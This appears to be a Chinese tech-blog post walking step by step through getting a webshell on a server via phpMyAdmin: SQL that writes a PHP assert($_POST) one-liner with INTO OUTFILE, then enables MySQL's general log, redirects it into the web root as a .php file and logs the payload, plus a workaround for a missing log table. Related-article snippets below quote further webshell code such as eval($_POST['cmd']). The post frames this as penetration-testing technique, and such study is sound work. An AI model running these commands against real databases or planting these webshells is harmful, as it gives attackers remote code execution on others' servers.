php一句话木马连接客户端_【WEB安全】phpmyadmin通过日志写入一句话木马

最新推荐文章于 2024-03-16 18:00:00 发布
最新推荐文章于 2024-03-16 18:00:00 发布
阅读量766 收藏 1
点赞数
文章标签: php一句话木马连接客户端 plsql导出表的log日志在哪 一句话木马php

1.想通过into outfile写入一句话木马

select '<?php assert($_POST["cmd"];?)>' into outfile 'D:/phpstudy/PHPTutorial/WWW/xx.php';

需要知道绝对路径

2.执行下来,报错 “MySQL服务器正在使用--secure-file-priv选项运行,因此它无法执行此语句”

2d8f713493f500b91b02b60cf495ff65.png

那么就要知道这个 secure-file-priv是干什么用的。secure-file-priv这个全局变量是指定文件夹作为导出文件存放的地方,默认情况下,secure-file-priv是一个空值(NULL)。

我们现在把secure-file-priv设置为网站的根目录,再去尝试使用INTO OUTFILEgetshell。

3cbc448d51108c528251717d20b2078b.png

执行下来报错,这个变量仅仅只是可读的变量。

3.思路卡壳了,转向从日志写入一句话。

Mysql的两个全局变量:

general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

general log file 指的是日志的保存路径。

e523efb536e7cf4d0e9ef633842c0ca8.png

目前这个general_log为off状态,那么日志就没有被记录进去,所以先打开这个全局变量。

set global general_log='on';

175fcacf7902dace254612e27e5b145b.png

打开过后,就会出现日志文件

4b1eecedee76ad1fe418a382dc6d6e09.png

文件内容

3b5f8550d4ef53b80e4081a43790f1b0.png

执行一条sql语句便会被记录到日志文件种去。

所以可以从日志写入一句话来试试。那么既然日志是保存在这个文件中,要写入一句话,应该要把日志存放的文件位置换成想要生成的一句话木马文件。那么就需要修改general_log_file变量的位置了。
set global general_log_file=’D:/phpstudy/PHPTutorial/WWW/xxx.php’

那就写入一句话进日志

select ‘<?php assert($_POST[“admin”]);?>’;

8387335aefab539f61146a31ca264e37.png

访问一波,成功解析。

7479566a110f9c6a7ecba6f71e37be55.png

奇技淫巧:

mysql版本: 5.5.53
尝试开启日志功能写文件,但是提示表 mysql.general_log不存在
mysql> set global general_log = on;
ERROR 1146 (42S02): Table 'mysql.general_log' doesn't exist
解决思路:
从其他数据库中提取表 mysql.general_log信息
然后切换到mysql库中执行以下SQL语句
CREATE TABLE IF NOT EXISTS `general_log` (
`event_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
`user_host` mediumtext NOT NULL,
`thread_id` int(11) NOT NULL,
`server_id` int(10) unsigned NOT NULL,
`command_type` varchar(64) NOT NULL,
`argument` mediumtext NOT NULL
) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='General log';
再次执行
set global general_log = on;
select 'shell' 即成功拿到shell

weixin_39531582
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
菜刀连接PHP WebShell返回200错误
bloodzer0
06-17 6154
错误详情 WebShell内容: <?php @eval($_POST['cmd']); ?> 错误详情: 在Hackber或BurpSuite中却没有问题: 原因分析 PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用assert会提示:Warning: Cannot call func_num_args() dynamically in %s on line %d 如果把一句Shell中的@符号去掉,会提示:Cannot call as
phpmyadmin一句.txt
07-18
phpmyadmin一句
利用phpMyAdminwebshell
05-01
利用phpMyAdminwebshell 利用phpMyAdminwebshell
lanker一句PHP后门客户3.0内部版
09-16
lanker一句PHP后门客户3.0内部版
渗透干货|史上最全一句木马
最新发布
2201_75362610的博客
03-16 1267
/可执行命令一句密码-7ASPX一句的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
动手实现简易PHP一句连接工具——FruitKnife
垃圾管理员的垃圾站
08-24 1409
文章目录效果展示连接一句浏览服务器目录打开文件跳转目录上传文件前言设计思路与需求分析功能实现连接一句浏览目录打开文件跳转路径上传文件节目清单不足之处工具名字的由来关于系列另外两个小工具简易版HTTP报文截获工具——CatcherExif信息编辑器——ExifEditor 效果展示 连接一句 浏览服务器目录 打开文件 跳转目录 上传文件 前言 小工具由Python语言实现,虽然并不复杂,但是为了能够更好地理解以下内容,需要读者具有PHP语言基础(能看懂代码就行,不必具有开发能力),并在阅读本文
php中fputs写入一句,PHP中的fputs()函数
weixin_29029169的博客
03-11 320
使用fpus()PHP中的函数写入打开的文件。它是的别名fwrite()。该fputs()函数返回成功写入的字节数。失败时返回FALSE。该fputs()函数在文件末尾或达到指定长度时暂停,以先到者为准。语法fputs(file_pointer,string,length)参数file_pointer-使用创建的文件指针fopen()。需要。string-要写入的字符串。需要。长度-最大字节数...
【渗透测试】phpmyadmin一句写入+socks代理渗透内网+CVE-2021-3493漏洞利用
serendipity1130的博客
09-02 882
OFF表示日志关闭C:\phpStudy\MySQL\data\stu1.log为日志绝对路径
php一句怎么写_PHP一句木马后门
weixin_39948309的博客
03-08 1121
在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句木马,从客户轻松连接服务器。一句木马的原理很简单,造型也很简单,所以造成了它理解起来容易,抵御起来也容易。于是黑白的较量变成了黑帽不断的构造变形的后门,去隐蔽特征,而白帽则不断的更新过滤方法,建起更高的城墙。一、原理简述对于不同的语言有不同的构造方法。基本构造:最...
php一句木马连接客户_代码执行函数之一句木马
weixin_39580042的博客
12-06 1472
前言大家好,我是阿里斯,一名IT行业小白。今天分享的内容是代码执行函数之一句木马的构造。内容简单实用,没有过多的废,希望能帮助到大家。函数eval()$a = $_POST['cmd1'];eval($a);assert()assert($_REQUEST['a']); #11年的菜刀可以使用 ,其它版本不行# 参考链接 https://www.freebuf.com/article...
PHP文件包含与一句木马实验代码
a2788656708的博客
12-03 2550
文件包含 1.新建phpinfo.php文件 2.用include语句包含phpinfo.php文件 3.浏览器访问 1.利用require 语句包含phpinfo.php文件 2.浏览器访问 一句木马 ASSERT函数 1.利用assert函数创建get.php 2.浏览器访问 在url中 ip地址后输入 cmd=system("whoami"); 1.利用assert函数创建post.php 2.浏览器访问 在post data 栏 输入 ...
adminer 一个类似于phpMyAdmin的MySQL管理客户
04-06
Adminer是一个类似于phpMyAdmin的MySQL管理客户。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的版本...
1.rar_WEB开发_PHP_
08-10
系统运行环境: ☆语言环境:PHP ☆数据库类型:MYSQL ☆服务器操作系统:支持跨平台运行.Windows,Linux/Unix 使用方法: 1.进phpmyadmin新建数据库,然后导进压缩包里的.SQL数据库备份文件
在线管理mysql好工具,类似于phpMyAdmin的MySQL管理客户 整个程序只有一个PHP文件,易于使用和安装
01-18
1: 兼容PHP 5.3+以上, 修复许多异常. 2: html代码标准化修改. 3: 增加Query log 功能, 可列表当前执行的所有语句. 4: 功能及样式细节修复.
phpMyAdmin一个基于Web的MySQLMariaDB数据库管理工具
08-07
phpMyAdmin - 一个基于Web的MySQL/MariaDB数据库管理工具
零魂PHP一句***客户
weixin_34107739的博客
01-05 184
文/零魂 1.填好一句WebShell地址和密码并点提交之后,后续操作不用再依赖客户,基本上剩下的和操作大马没什么两样。 2.完全POST提交,避免了WebServer记录敏感数据。如果一句插在有正常用户访问的PHP文件的,插完时间也改回来了,那么管理员发现的概率就相当低了。(海洋的不是全POST) 大概原理: 一键提交版的一句客户连接成功之后,每次POS...
php一句客戶,那些强悍的PHP一句后门(3)
weixin_33957089的博客
03-16 254
三个变形的一句PHP木马第一个在菜单里写http://site/1.php?2=assert密码是1第二个$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你...
python hacker_Python hacker 之 爆破一句木马
weixin_39846898的博客
12-05 500
00x1:需要用到的模块如下:import requests00x2:首先我们了解一下一句木马,一般post传递参一个简单的php一句木马eval($_POST['x'])?>先测试一下连接OK,没问题,我们用浏览器打开传参看一下由此可以看到密码为x,变量提交能匹配上即执行echo语句这时我猜大家都有了思路,构造post请求即可00x3:这里我们可以利用网址特性提交多个参数这样可以提高爆...
连接phpmyadmin创建php,phpmyadmin怎么创建约束
06-07
要在phpMyAdmin中创建约束,可以按照以下步骤: 1. 登录phpMyAdmin并选择要创建约束的数据库。 2. 在左侧边栏中选择“表”,然后选择要应用约束的表。 3. 在表中,选择“结构”选项卡,然后在要设置约束的列旁边选择“编辑”。 4. 在“编辑列”页面上,可以找到“索引”和“关系”选项卡。选择“关系”选项卡。 5. 在“关系”选项卡中,可以设置外键约束。选择“外键约束”复选框,并指定引用表和列,以及删除和更新行为。 6. 单击“保存”按钮以应用约束。 注意:在设置约束之前,请确保您已经创建了引用表和列,并且这些列具有唯一约束。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值